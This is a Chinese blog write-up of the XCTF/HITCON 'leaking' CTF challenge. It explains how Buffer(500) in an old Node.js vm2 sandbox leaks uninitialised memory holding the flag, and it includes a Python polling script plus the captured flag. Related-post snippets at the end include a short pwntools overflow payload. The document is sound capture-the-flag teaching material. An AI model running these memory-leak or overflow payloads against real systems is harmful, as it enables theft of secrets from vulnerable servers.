攻防世界xctfweb题leaking题解

最新推荐文章于 2022-06-24 16:53:00 发布
最新推荐文章于 2022-06-24 16:53:00 发布
阅读量5.8k 收藏
点赞数 1
文章标签: javascript 前端 开发语言 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_60787987/article/details/123464329
版权

打开网站我们可以看到如下代码

"use strict";

var randomstring = require("randomstring");
var express = require("express");
var {
    VM
} = require("vm2");
var fs = require("fs");

var app = express();
var flag = require("./config.js").flag

app.get("/", function(req, res) {
    res.header("Content-Type", "text/plain");

    /*    Orange is so kind so he put the flag here. But if you can guess correctly :P    */
    eval("var flag_" + randomstring.generate(64) + " = \"flag{" + flag + "}\";")
    if (req.query.data && req.query.data.length <= 12) {
        var vm = new VM({
            timeout: 1000
        });
        console.log(req.query.data);
        res.send("eval ->" + vm.run(req.query.data));
    } else {
        res.send(fs.readFileSync(__filename).toString());
    }
});

app.listen(3000, function() {
    console.log("listening on port 3000!");
});

 这里涉及到了node.js的知识以及沙箱的知识。

贴几篇文章可以了解一下其中的知识。​​​​​​Node.js沙箱逃逸

浅谈 Node.js安全

首先,通过简单的代码审计我们知道由于存在eval我们是可以在vm2环境中执行命令的,但是会被req.query.data.length限制。

所以我们要思考如何绕过限制。这里涉及到Node.js中的buffer函数

在较早一点的 node 版本中 (8.0 之前),当 Buffer 的构造函数传入数字时, 会得到与数字长度一致的一个 Buffer,并且这个 Buffer 是未清零的 8.0 之后的版本可以通过另一个函数 Buffer.allocUnsafe(size) 来获得未清空的内存

也就是说,我们可以通过buffer来读取内存,从而绕过限制。 

这里贴别人wp的脚本:

# encoding=utf-8

import requests
import time
url = 'http://YOURIP:PORT?data=Buffer(500)'
response = ''
while 'flag' not in response:
        req = requests.get(url)
        response = req.text
        print(req.status_code)
        time.sleep(0.1)
        if 'flag{' in response:
            print(response)
            break

(小声bb一句这个脚本我不知道为什么执行不了,提示显示ModuleNotFoundError: No module named 'requests'。毕竟自己太菜了,还没学python)

拿到flag

flag{4nother_h34rtbleed_in_n0dejs}

0x_1Ang
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
信息安全_数据安全_asec-t08-leaking-ads-is-user-data-truly-secure.pdf
08-21
信息安全_数据安全_asec-t08-leaking-ads-is-user-data-truly-secure 金融安全 安全研究 安全编码 安全审计 漏洞挖掘
private-leaking-investigation:用于演示 AngularJS 内存泄漏的示例应用程序
06-18
私人泄密调查 用于演示 AngularJS 内存泄漏的示例应用程序
Cisco-Fusion-Router-IOS-XE-route-leaking-guide from yuanshou
最新发布
06-17
Cisco_Fusion_Router_IOS_XE_route-leaking_guide from yuanshou
RSA 2018PPT汇总(108份).zip
01-03
['air-r1-2-the_bottom_of_the_barrel_scraping_pastebin_for_obfuscated_malware.pdf', 'air-t08-insights-from-nsas-cybersecurity-threat-operations-center.pdf', 'air-w12-threat-intel-_-content-curation-organizing-the-path-to-successful-detection.pdf', 'asec-t08-leaking-ads-is-user-data-truly-secure.pdf', 'asec-t10-realizing-software-security-maturity-the-growing-pains-and-gains.pdf', 'asec-w04-derived-unique-token-per-transaction.pdf', 'asec-w12-repronow-save-time-reproducing-and-triaging-security-bugs.pdf', 'ast1-r02-cybersecurity_capability_readiness-necessary_conversations_next_steps.pdf', 'ast1-w02-the_cybersecurity_job_seekers_report-results_and_implications.pdf', 'ast2-r02_strategies_to_finding_and_building_your_robust_workforce.pdf', 'ast2-w02-the_nist_cybersecurity_framework-what_s_next.pdf', 'ast3-r02-the_life_and_times_of_cybersecurity_professionals.pdf', 'ast3-w02-the_promise_of_iot_best_practices_testing_the_hazards_of_inaction.pdf', 'cryp-f01-side-channels-2.pdf', 'cryp-f02-codes-and-isogenies.pdf', 'cryp-f03-other-cryptography.pdf', 'cryp-r02-block-ciphers.pdf', 'cryp-r04-hash-and-mac-functions.pdf', 'cryp-r1-2-digital-sigatures.pdf', 'cryp-r14-secure-storage.pdf', 'cryp-t07-side-channels-1.pdf', 'cryp-t08-general-cryptography.pdf', 'cryp-t10-lattice-based-cryptography.pdf', 'cryp-w02-computing-on-encrypted-data.pdf', 'cryp-w04-cryptographic-protocols.pdf', 'cryp-w14-post-quantum-cryptography.pdf', 'csv-r1-2-red-team-vs.-blue-team-on-aws.pdf', 'csv-r14-fim-and-system-call-auditing-at-scale-in-a-large-container-deployment.pdf', 'csv-t10-confessions-of-a-cloud-security-convert.pdf', 'csv-w12-ephemeral-devops-adventures-in-managing-short-lived-systems.pdf', 'cxo-f02_securing-innovation-shifting-the-conversation-from-fear-to-possibility.pdf', 'cxo-f03-business-executive-fundamentals-how-to-beat-the-mbas-at-their-own-game_finalpptx.pdf', 'dev-f01-dos-and-donts-of-devsecops.pdf', 'dev-f03-devops-and-the-future-of-enterprise-security.pdf', 'dev-r04-agile-and-conti
攻防世界-leaking-(详细操作)做过程
qq_43715020的博客
06-18 254
攻防世界-leaking-(详细操作)做过程
xctf攻防世界 Web高手进阶区 leaking
l8947943的博客
01-01 1627
1. 进入环境,查看内容,给了一堆代码 看到基本的代码格式,还有其中var { VM } = require(“vm2”);,这是Node.js的代码。其中也给了一句注释: /* Orange is so kind so he put the flag here. But if you can guess correctly :P */ eval("var flag_" + randomstring.generate(64) + " = \"flag{" + flag + "}\"
攻防世界 WEB leaking
qq_41696858的博客
08-25 356
考的是node.js沙箱逃逸,之前没遇到过,属于是又学到新知识了 具体看这一篇,https://juejin.cn/post/6889226643525599240 简单说一下原理吧,就是理论上沙箱里的代码只能与vm上下文打交道,可是vm上下文确是可以与沙箱外的代码和变量打交道的,因此,如果我们能够构造请求, 使得vm上下文代替我们去读取利用沙箱外的代码和变量的话,那就形成了沙箱逃逸,拿这一来举个例吧 先看一下代码 "use strict"; var randomstring = require("
xctf攻防世界Leaking wp
sash1mi
01-15 1676
访问目地址 "use strict"; var randomstring = require("randomstring"); var express = require("express"); var { VM } = require("vm2"); var fs = require("fs"); var app = express(); var flag = require("./config.js").flag app.get("/", function(req, res) { .
攻防世界 web leaking
Zeker62的博客
09-08 190
https://blog.csdn.net/weixin_46676743/article/details/112669105
攻防世界 web高级 leaking
beihai2013
01-18 677
考察:node.js逃逸 参考: https://blog.csdn.net/weixin_44037296/article/details/112387663 https://blog.csdn.net/weixin_46676743/article/details/112669105 不知道咋说,直接抄源码 # encoding=utf-8 import requests import time url = 'http://220.249.52.134:41148/?data=Buffer(500)'
Gradient Inversion Attack Leaking Private Labels in Two-Party Sp
01-03
Gradient Inversion Attack Leaking Private Labels in Two-Party Split Learning_两方分裂学习中泄漏私有标签的梯度反转攻击.pdf
攻防世界——leaking
m0_62063669的博客
06-24 275
攻防世界——leaking进入环境,给了一段代码浅谈npm,vm,vm2,Node.js沙盒逃逸这是一是关于Node.js沙盒逃逸的。其中var { VM } = require(“vm2”);是Node.js 官方安全沙箱的库(是Node.js有关沙盒的代码)低版本的node可以使用buffer()来查看内存,只要调用过的变量,都会存在内存中,那么可以构造paylaod来读取内存 req.query.data.length 的限制可以通过传入数组绕过1.目通过访问得到了一串代码,这段代码提示在沙箱中.
攻防世界 web高手进阶区 5分 leaking
闵行小鱼塘
04-14 608
攻防世界web高手进阶区的5分,本篇是leaking的writeup
BUUCTF [HITCON 2016] Leaking
Senimo
01-15 766
BUUCTF [HITCON 2016] Leaking 考点: 启动环境: "use strict"; var randomstring = require("randomstring"); var express = require("express"); var { VM } = require("vm2"); var fs = require("fs"); var app = express(); var flag = require("./config.js").flag app.g
XCTF Leaking
m0_64898960的博客
04-08 1560
[HITCON2016]Leaking
BUUCTF--[HITCON 2016]Leaking
qq_46263951的博客
08-13 248
进入页面后给出代码 "use strict"; var randomstring = require("randomstring"); var express = require("express"); var { VM } = require("vm2"); var fs = require("fs"); var app = express(); var flag = require("./config.js").flag app.get("/", function(req, res).
[HITCON 2016]Leaking沙箱逃逸学习
Y4tacker的博客
02-23 780
[HITCON 2016]Leaking沙箱逃逸学习 node.js 里提供了 vm 模块,相当于一个虚拟机,可以让你在执行代码时候隔离当前的执行环境,避免被恶意代码攻击。但是这道比较有意思 考点是: node.js中VM2沙箱逃逸 JS通过Buffer 类处理二进制数据的缓冲区 首先给出了目的源码 "use strict"; var randomstring = require("randomstring"); var express = require("express"); var {
攻防世界level0
qq_45213259的博客
07-24 1317
from pwn import * p = remote("111.198.29.45","32092") call_system = 0x400596 print p64(call_system) payload = 0x88*'a' + p64(call_system) p.sendline(payload) p.interactive()
使用RandomString方法后,结果返回相同的随机数解决办法
xxzh_pengpeng的博客
03-12 1076
所遇问: 在做超市管理系统的登录项目时,在对“随机数的产生”出现一个问,在产生多个随机数的时候,出现了产生了多个一样的随机数,具体代码如下:         /// <summary> /// 生成随机字符串 /// </summary> /// <param name="length">字符串...
Leaking Caffe2 thread-pool after fork.
05-23
这个错误通常是由于在主进程中创建了Caffe2线程池,但在子进程中没有正确地清理它所引起的。这可能会导致子进程中的线程池泄漏,从而导致性能下降或其他问。 要解决此问,您可以在fork之后立即清理Caffe2线程池...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值